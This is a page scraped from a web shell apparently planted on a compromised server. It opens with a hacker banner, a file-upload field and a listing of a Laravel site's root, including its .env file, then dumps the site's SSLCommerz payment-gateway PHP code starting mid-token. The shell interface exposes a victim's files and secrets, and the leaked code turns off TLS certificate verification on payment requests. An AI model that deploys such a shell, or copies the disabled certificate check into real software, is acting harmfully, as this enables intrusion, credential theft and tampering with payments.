I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
output;
$credentials = $this->getSslCredentials($output);
$reference = generateTransactionReference();
$amount = $output['amount']->total_amount ? number_format($output['amount']->total_amount,2,'.','') : 0;
$currency = $output['currency']['currency_code'] ?? "BDT";
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$success_url = route('donation.ssl.success');
$fail_url = route('donation.ssl.fail');
$cancel_url = route('donation.ssl.cancel');
}else{
$success_url = route('add.money.ssl.success');
$fail_url = route('add.money.ssl.fail');
$cancel_url = route('add.money.ssl.cancel');
}
if(auth()->guard(get_auth_guard())->check()){
$user = auth()->guard(get_auth_guard())->user();
$user_email = $user->email;
$user_phone = $user->full_mobile ?? '';
$user_name = $user->firstname.' '.$user->lastname ?? '';
}else{
$user_email = '';
$user_phone = '';
$user_name = '';
}
$post_data = array();
$post_data['store_id'] = $credentials->store_id??"";
$post_data['store_passwd'] = $credentials->store_password??"";
$post_data['total_amount'] =$amount;
$post_data['currency'] = $currency;
$post_data['tran_id'] = $reference;
$post_data['success_url'] = $success_url;
$post_data['fail_url'] = $fail_url;
$post_data['cancel_url'] = $cancel_url;
# EMI INFO
$post_data['emi_option'] = "1";
$post_data['emi_max_inst_option'] = "9";
$post_data['emi_selected_inst'] = "9";
# CUSTOMER INFORMATION
$post_data['cus_name'] = $user->fullname??"Test Customer";
$post_data['cus_email'] = $user->email??"test@test.com";
$post_data['cus_add1'] = $user->address->country??"Dhaka";
$post_data['cus_add2'] = $user->address->address??"Dhaka";
$post_data['cus_city'] = $user->address->city??"Dhaka";
$post_data['cus_state'] = $user->address->state??"Dhaka";
$post_data['cus_postcode'] = $user->address->zip??"1000";
$post_data['cus_country'] = $user->address->country??"Bangladesh";
$post_data['cus_phone'] = $user->full_mobile??"1711111111";
$post_data['cus_fax'] = "";
# PRODUCT INFORMATION
$post_data['product_name'] = "Add Money";
$post_data['product_category'] = "Add Money";
$post_data['product_profile'] = "Add Money";
# SHIPMENT INFORMATION
$post_data['shipping_method'] = "NO";
$data = [
'request_data' => $post_data,
'amount' => $amount,
'email' => $user_email,
'tx_ref' => $reference,
'currency' => $currency,
'customer' => [
'email' => $user_email,
"phone_number" => $user_phone,
"name" => $user_name
],
"customizations" => [
"title" => "Add Money",
"description" => dateFormat('d M Y', Carbon::now()),
]
];
if( $credentials->mode == Str::lower(PaymentGatewayConst::ENV_SANDBOX)){
$link_url = $credentials->sandbox_url;
}else{
$link_url = $credentials->live_url;
}
# REQUEST SEND TO SSLCOMMERZ
$direct_api_url = $link_url."/gwprocess/v4/api.php";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $direct_api_url );
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($handle, CURLOPT_POST, 1 );
curl_setopt($handle, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, FALSE); # KEEP IT FALSE IF YOU RUN FROM LOCAL PC
$content = curl_exec($handle );
$result = json_decode( $content,true);
if($result['status'] != "SUCCESS"){
throw new Exception($result['failedreason']);
}
$this->sslJunkInsert($data);
return redirect($result['GatewayPageURL']);
}
public function getSslCredentials($output) {
$gateway = $output['gateway'] ?? null;
if(!$gateway) throw new Exception("Payment gateway not available");
$store_id_sample = ['store_id','Store Id','store-id'];
$store_password_sample = ['Store Password','store-password','store_password'];
$sandbox_url_sample = ['Sandbox Url','sandbox-url','sandbox_url'];
$live_url_sample = ['Live Url','live-url','live_url'];
$store_id = '';
$outer_break = false;
foreach($store_id_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->sllPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->sllPlainText($label);
if($label == $modify_item) {
$store_id = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$store_password = '';
$outer_break = false;
foreach($store_password_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->sllPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->sllPlainText($label);
if($label == $modify_item) {
$store_password = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$sandbox_url = '';
$outer_break = false;
foreach($sandbox_url_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->sllPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->sllPlainText($label);
if($label == $modify_item) {
$sandbox_url = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$live_url = '';
$outer_break = false;
foreach($live_url_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->sllPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->sllPlainText($label);
if($label == $modify_item) {
$live_url = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$mode = $gateway->env;
$paypal_register_mode = [
PaymentGatewayConst::ENV_SANDBOX => "sandbox",
PaymentGatewayConst::ENV_PRODUCTION => "live",
];
if(array_key_exists($mode,$paypal_register_mode)) {
$mode = $paypal_register_mode[$mode];
}else {
$mode = "sandbox";
}
return (object) [
'store_id' => $store_id,
'store_password' => $store_password,
'sandbox_url' => $sandbox_url,
'live_url' => $live_url,
'mode' => $mode,
];
}
public function sllPlainText($string) {
$string = Str::lower($string);
return preg_replace("/[^A-Za-z0-9]/","",$string);
}
public function sslJunkInsert($response) {
$output = $this->output;
$user = auth()->guard(get_auth_guard())->user();
$creator_table = $creator_id = $wallet_table = $wallet_id = null;
if($user != null) {
$creator_table = auth()->guard(get_auth_guard())->user()->getTable();
$creator_id = auth()->guard(get_auth_guard())->user()->id;
$wallet_table = $output['wallet']->getTable();
$wallet_id = $output['wallet']->id;
}
if (Auth::guard(get_auth_guard())->check()) {
$user_type = PaymentGatewayConst::AUTHENTICATED;
} else {
$user_type = PaymentGatewayConst::GUEST;
}
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$data = [
'gateway' => $output['gateway']->id,
'payment_type' => $output['request_data']['payment_type'],
'currency' => $output['currency']->id,
'amount' => json_decode(json_encode($output['amount']),true),
'response' => $response,
'campaign_id' => $output['request_data']['campaign_id'],
'wallet_table' => $wallet_table,
'wallet_id' => $wallet_id,
'creator_table' => $creator_table,
'creator_id' => $creator_id,
'user_type' => $user_type,
'creator_guard' => get_auth_guard(),
];
}else{
$data = [
'gateway' => $output['gateway']->id,
'payment_type' => $output['request_data']['payment_type'],
'currency' => $output['currency']->id,
'amount' => json_decode(json_encode($output['amount']),true),
'response' => $response,
'wallet_table' => $wallet_table,
'wallet_id' => $wallet_id,
'creator_table' => $creator_table,
'creator_id' => $creator_id,
'user_type' => $user_type,
'creator_guard' => get_auth_guard(),
];
}
return TemporaryData::create([
'type' => PaymentGatewayConst::SSLCOMMERZ,
'identifier' => $response['tx_ref'],
'data' => $data,
]);
}
public function sslcommerzSuccess($output = null) {
if(!$output) $output = $this->output;
$token = $this->output['tempData']['identifier'] ?? "";
if(empty($token)) throw new Exception('Transaction failed. Record didn\'t saved properly. Please try again.');
return $this->createTransactionSsl($output);
}
public function createTransactionSsl($output) {
$trx_id = generateTrxString("transactions","trx_id",'AM',8);
$inserted_id = $this->insertRecordSsl($output,$trx_id);
$this->insertChargesSsl($output,$inserted_id);
$this->insertDeviceSsl($output,$inserted_id);
$this->removeTempDataSsl($output);
if($this->requestIsApiUser()) {
// logout user
$api_user_login_guard = $this->output['api_login_guard'] ?? null;
if($api_user_login_guard != null) {
auth()->guard($api_user_login_guard)->logout();
}
}
}
public function insertRecordSsl($output,$trx_id) {
$trx_id = $trx_id;
$token = $this->output['tempData']['identifier'] ?? "";
DB::beginTransaction();
try{
if(Auth::guard(get_auth_guard())->check()){
$user_id = Auth::guard(get_auth_guard())->user()->id;
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
// Campaign donation
$trx_id = generateTrxString("transactions","trx_id",'D',9);
$id = DB::table("transactions")->insertGetId([
'user_id' => $user_id,
'user_wallet_id' => $output['wallet']->id,
'payment_gateway_currency_id' => $output['currency']->id,
'campaign_id' => $output['request_data']['campaign_id'],
'type' => $output['request_data']['payment_type'],
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'available_balance' => $output['wallet']->balance,
'remark' => ucwords(remove_speacial_char($output['request_data']['payment_type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output),
'status' => true,
'created_at' => now(),
]);
$this->updateSSLCampaign($output);
}else{
// Add money
$trx_id = generateTrxString("transactions","trx_id",'AM',8);
$id = DB::table("transactions")->insertGetId([
'user_id' => $user_id,
'user_wallet_id' => $output['wallet']->id,
'payment_gateway_currency_id' => $output['currency']->id,
'type' => $output['request_data']['payment_type'],
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'available_balance' => $output['wallet']->balance + $output['amount']->requested_amount,
'remark' => ucwords(remove_speacial_char($output['request_data']['payment_type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output),
'status' => true,
'created_at' => now(),
]);
$this->updateWalletBalanceSsl($output);
}
}else{
// Campaign donation
$trx_id = generateTrxString("transactions","trx_id",'D',9);
$id = DB::table("transactions")->insertGetId([
'payment_gateway_currency_id' => $output['currency']->id,
'campaign_id' => $output['request_data']['campaign_id'],
'type' => $output['request_data']['payment_type'],
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'remark' => ucwords(remove_speacial_char($output['request_data']['payment_type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output),
'status' => true,
'created_at' => now(),
]);
$this->updateSSLCampaign($output);
}
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
return $id;
}
// Update campaign
public function updateSSLCampaign($output){
$id = $output['request_data']['campaign_id'];
$campaign = Campaign::findOrFail($id);
$campaign->update([
'raised' => $campaign->raised + $output['amount']->requested_amount,
'to_go' => $campaign->to_go - $output['amount']->requested_amount,
]);
}
public function updateWalletBalanceSsl($output) {
$update_amount = $output['wallet']->balance + $output['amount']->requested_amount;
$output['wallet']->update([
'balance' => $update_amount,
]);
}
public function insertChargesSsl($output,$id) {
if(Auth::guard(get_auth_guard())->check()){
$user = auth()->guard(get_auth_guard())->user();
}
DB::beginTransaction();
try{
DB::table('transaction_charges')->insert([
'transaction_id' => $id,
'percent_charge' => $output['amount']->percent_charge,
'fixed_charge' => $output['amount']->fixed_charge,
'total_charge' => $output['amount']->total_charge,
'created_at' => now(),
]);
DB::commit();
if(Auth::guard(get_auth_guard())->check()){
//notification
$notification_content = [
'title' => "Add Money",
'message' => "Your Wallet (".$output['wallet']->currency->code.") balance has been added ".$output['amount']->requested_amount.' '. $output['wallet']->currency->code,
'time' => Carbon::now()->diffForHumans(),
'image' => files_asset_path('profile-default'),
];
UserNotification::create([
'type' => NotificationConst::BALANCE_ADDED,
'user_id' => Auth::guard(get_auth_guard())->user()->id,
'message' => $notification_content,
]);
}
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
}
public function insertDeviceSsl($output,$id) {
$client_ip = request()->ip() ?? false;
$location = geoip()->getLocation($client_ip);
$agent = new Agent();
// $mac = exec('getmac');
// $mac = explode(" ",$mac);
// $mac = array_shift($mac);
$mac = "";
DB::beginTransaction();
try{
DB::table("transaction_devices")->insert([
'transaction_id'=> $id,
'ip' => $client_ip,
'mac' => $mac,
'city' => $location['city'] ?? "",
'country' => $location['country'] ?? "",
'longitude' => $location['lon'] ?? "",
'latitude' => $location['lat'] ?? "",
'timezone' => $location['timezone'] ?? "",
'browser' => $agent->browser() ?? "",
'os' => $agent->platform() ?? "",
]);
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
}
public function removeTempDataSsl($output) {
TemporaryData::where("identifier",$output['tempData']['identifier'])->delete();
}
//for api
public function sslcommerzInitApi($output = null) {
if(!$output) $output = $this->output;
$credentials = $this->getSslCredentials($output);
$reference = generateTransactionReference();
$amount = $output['amount']->total_amount ? number_format($output['amount']->total_amount,2,'.','') : 0;
$currency = $output['currency']['currency_code']??"USD";
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$success_url = route('api.v1.user.donation.ssl.success', "r-source=".PaymentGatewayConst::APP);
$fail_url = route('api.v1.user.donation.ssl.fail', "r-source=".PaymentGatewayConst::APP);
$cancel_url = route('api.v1.user.donation.ssl.cancel', "r-source=".PaymentGatewayConst::APP);
}else{
$success_url = route('api.v1.user.add-money.ssl.success', "r-source=".PaymentGatewayConst::APP);
$fail_url = route('api.v1.user.add-money.ssl.fail', "r-source=".PaymentGatewayConst::APP);
$cancel_url = route('api.v1.user.add-money.ssl.cancel', "r-source=".PaymentGatewayConst::APP);
}
if(auth()->guard(get_auth_guard())->check()){
$user = auth()->guard(get_auth_guard())->user();
$user_email = $user->email;
$user_phone = $user->full_mobile ?? '';
$user_name = $user->firstname.' '.$user->lastname ?? '';
}else{
$user_email = '';
$user_phone = '';
$user_name = '';
}
$post_data = array();
$post_data['store_id'] = $credentials->store_id??"";
$post_data['store_passwd'] = $credentials->store_password??"";
$post_data['total_amount'] =$amount;
$post_data['currency'] = $currency;
$post_data['tran_id'] = $reference;
$post_data['success_url'] = $success_url;
$post_data['fail_url'] = $fail_url;
$post_data['cancel_url'] = $cancel_url;
# $post_data['multi_card_name'] = "mastercard,visacard,amexcard"; # DISABLE TO DISPLAY ALL AVAILABLE
# EMI INFO
$post_data['emi_option'] = "1";
$post_data['emi_max_inst_option'] = "9";
$post_data['emi_selected_inst'] = "9";
# CUSTOMER INFORMATION
$post_data['cus_name'] = $user->fullname??"Test Customer";
$post_data['cus_email'] = $user->email??"test@test.com";
$post_data['cus_add1'] = $user->address->country??"Dhaka";
$post_data['cus_add2'] = $user->address->address??"Dhaka";
$post_data['cus_city'] = $user->address->city??"Dhaka";
$post_data['cus_state'] = $user->address->state??"Dhaka";
$post_data['cus_postcode'] = $user->address->zip??"1000";
$post_data['cus_country'] = $user->address->country??"Bangladesh";
$post_data['cus_phone'] = $user->full_mobile??"1711111111";
$post_data['cus_fax'] = "";
# PRODUCT INFORMATION
$post_data['product_name'] = "Add Money";
$post_data['product_category'] = "Add Money";
$post_data['product_profile'] = "Add Money";
# SHIPMENT INFORMATION
$post_data['shipping_method'] = "NO";
$data = [
'request_data' => $post_data,
'amount' => $amount,
'email' => $user_email,
'tx_ref' => $reference,
'currency' => $currency,
'customer' => [
'email' => $user_email,
"phone_number" => $user_phone,
"name" => $user_name
],
"customizations" => [
"title" => "Add Money",
"description" => dateFormat('d M Y', Carbon::now()),
]
];
if( $credentials->mode == Str::lower(PaymentGatewayConst::ENV_SANDBOX)){
$link_url = $credentials->sandbox_url;
}else{
$link_url = $credentials->live_url;
}
# REQUEST SEND TO SSLCOMMERZ
$direct_api_url = $link_url."/gwprocess/v4/api.php";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $direct_api_url );
curl_setopt($handle, CURLOPT_TIMEOUT, 30);
curl_setopt($handle, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($handle, CURLOPT_POST, 1 );
curl_setopt($handle, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, FALSE); # KEEP IT FALSE IF YOU RUN FROM LOCAL PC
$content = curl_exec($handle );
$result = json_decode( $content,true);
if( $result['status'] != "SUCCESS"){
throw new Exception($result['failedreason']);
}
$data['link'] = $result['GatewayPageURL'];
$data['trx'] = $reference;
$this->sslJunkInsert($data);
return $data;
}
}